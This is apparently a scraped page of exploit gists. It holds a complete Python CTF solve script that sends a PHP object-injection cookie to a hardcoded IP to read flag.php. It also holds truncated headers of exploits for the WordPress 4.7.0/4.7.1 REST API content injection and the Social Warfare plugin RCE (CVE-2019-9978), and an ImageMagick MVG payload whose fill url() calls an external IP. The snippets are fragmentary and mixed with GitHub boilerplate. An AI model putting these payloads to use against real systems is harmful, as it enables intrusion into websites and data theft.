This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import re | |
from urllib import quote_plus | |
def main(): | |
cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}') | |
url = "http://104.154.70.126:10888/" | |
req = requests.get(url, cookies=dict(todos=cookie)) | |
print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split(" "))+'}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python | |
""" | |
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
Wordpress Version Affected: 4.7.0/4.7.1 | |
2017 - Coded by snoww0lf. | |
""" | |
import re |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
# Date: March, 2019 | |
# Researcher: Luka Sikic | |
# Exploit Author: hash3liZer | |
# Download Link: https://wordpress.org/plugins/social-warfare/ | |
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
# Github: https://github.com/hash3liZer/CVE-2019-9978 | |
# Version: <=3D 3.5.2 | |
# CVE: CVE-2019-9978 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
push graphic-context | |
viewbox 0 0 640 480 | |
fill 'url(http://103.200.7.150:8070/wew)' | |
pop graphic-context |
OlderNewer